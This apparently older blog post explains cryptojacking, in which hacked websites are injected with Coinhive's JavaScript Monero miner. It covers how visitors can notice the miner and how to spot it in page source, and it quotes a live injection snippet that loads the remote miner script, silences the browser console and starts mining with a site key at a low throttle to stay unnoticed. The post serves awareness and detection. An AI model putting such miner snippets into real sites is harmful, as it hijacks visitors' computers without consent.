Exploitation of websites for cryptocurrency mining

Exploitation of hacked websites for cryptocurrency mining gains popularity

Exploitation of hacked websites for cryptocurrency mining is a new thing, and it gets more popular day by day. Hacking websites for fun or other reasons like spamming, other exploitation is a thing of the past. All previous exploitation methods of hacked sites are outdated, have low-profit margins (except stealing of CC credentials and similar data) and incompatible with the modern trends. Now everyone wants cryptocurrencies, everyone obsessed about crypto money and everyone is ready to do anything to get it.

Coinhive JavaScript miner for the Monero Blockchain

Coinhive offers a JavaScript that anyone can easily embed to websites. This Javascript is a Monero Blockchain miner that uses the CPU power of website visitor PC for predefined calculations. You turn your PC into cryptocurrency mining machine when you visit the website equipped with Coinhive JavaScript mining.

Exploitation efficiency with Coinhive JavaScript

Coinhive declares that their JavaScript has 65% performance of a native miner. Besides, mining with CPU is not so efficient like mining with GPU, and for sure not so efficient as mining cryptocurrencies with ASIC (Application-specific integrated circuit) miners. There are more problems related to the efficiency of mining on browsers.

Mining requires time. More time means more calculations and hashing done. Only some specific sites could offer more extended visitor sessions, for example, websites that allow their users to watch movies online. Also, you can try to mine cryptocurrencies on more than one site to increase the exploiting rate, and this has recently been a source of great interest to hackers.

Coinhive has changed the behavior of hackers

Coinhive has fundamentally changed the objectives of some hacker attacks. Not so long ago hackers used their knowledge and skills to hack websites for fun (website defacing, leaving their hacker signatures) or profit (spam, SEO spam, pharma spam or even stealing credentials of credit cards). But now suddenly everything changed, now they try to work without the trace of their activity, and the only thing they want to leave is the Coinhive JavaScript running unattended on a hacked website.

Exploiting of previously hacked websites

There are signs that some of the hackers repeat their intrusion into previously hacked websites to remove any proof of hack and leave the site entirely functional but now equipped with cryptocurrency mining software. As I mentioned before, mining requires time, but if you split your mining code into tens, hundreds or even thousand websites you’ll get quite powerful mining net and this opportunity is attractive to the hackers.

For anyone who owns a website with average traffic Coinhive could be uninteresting, besides this involves risks to lose some audience due to ruined user experience if throttling set to a high level. But a hacker can run the miner on a dozen of websites it can achieve a sufficient mining rate virtually without any risk.

Since it’s hard to trace cryptocurrencies and owners of cryptocurrency wallets, all this stuff sounds like an endless Christmas for hackers.

How to identify and what to look for in the source code

The easiest way to identify that your PC is doing something more than usual is to pay attention to its performance. Cryptocurrency mining requires a lot of calculation power, and it means your PC CPU performance for other normal operations will decrease. In other words, your computer will be slower.

Another pretty good measure is to pay attention to how the computer tries to cool down itself. A lot of calculations require more electricity and generates way more heat. If your CPU fan or fans suddenly started to work at full throttle just a few seconds after a particular site loaded, it’s more likely that you’re already running a Coinhive or similar miner in your browser.

Here’s an example, PC with Intel i7 QuadCore processor exploited for mining by Coinhive JavaScript. The graph shows idle load and then suddenly load increases when I open the “piratebay247.net” website.

Coinhive mining graph - exploitation of CPU power

To hide this JavaScript presence, it is possible to adjust the throttling parameter. Lower throttle means fewer calculations and almost unnoticeable load on the CPU. In other words, mining is less aggressive and less profitable, but at the same time less noticeable.

When it is impossible to determinate unwanted mining operations according to computer processor behavior (slower system, higher load, and need for additional cooling), you can always check the source code of the suspicious site. Below you can see an example of source code part found on “piratebay247.net” website. Here you can see an embedded coinhive.min.js JavaScript with a throttle set to 0.5 which means less aggressive mining.

<script type="text/javascript" src="/fuckadblock.js"></script><script>!function(){for(var o,e=function(){},n=["assert","clear","count","debug","dir","dirxml","error","exception","group","groupCollapsed","groupEnd","info","log","markTimeline","profile","profileEnd","table","time","timeEnd","timeStamp","trace","warn"],r=n.length,i=window.console=window.console||{};r--;)o=n[r],i[o]||(i[o]=e)}();</script><script src="https://coinhive.com/lib/coinhive.min.js"></script><script>
    var miner = new CoinHive.Anonymous('OT1CIcpkIOCO7yVMxcJiqmSWoDWOri06', { throttle: 0.5 });

And finally, there are now dozens of extensions for browsers that can block Coinhive JavaScript automatically. Moreover some of the antivirus and antimalware programs actively blocking Coinhive or other mining software.

Proof of Work Captcha

Proof of work CAPTCHA by CoinhiveThere are more friendly ways to use Coinhive JavaScript, and they offer to use their JavaScript as alternative CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart). The main idea is to determinate user type (human or machine) by forcing it to make some mining calculations.

Well, this may sound nice, but I doubt that it is designed purely as a challenge-response test and capable to reliably determinate user type. Anyway if it is used only as CAPTCHA so why not, but I tried this Proof of Work Captcha on an old and slow PC, and it required a lot of time, so users with slower PC’s will get poor user experience.

On the other hand, if this “Proof of Work Captcha” can protect websites from brute force attacks or spamming by using the CPU resources of the attacker PC to generate you some cash you might be interested in this CAPTCHA alternative.

To conclude, I would say that Coinhive made a perfect tool for hackers to exploit the hacked websites. I don’t think that this JavaScript will be popular among the developers of reliable and well-known sites. Even with a low throttling, it ruins user experience for a virtually small profit, and there are several articles about the efficiency of a Coinhive miner in comparison with unintrusive ads. Ads generate more money and do not cause any suspicion or inconvenience to users. But for those who can exploit other’s websites and especially a large number of sites this JavaScript is a real gold mine.

Leave a Reply

Your email address will not be published. Required fields are marked *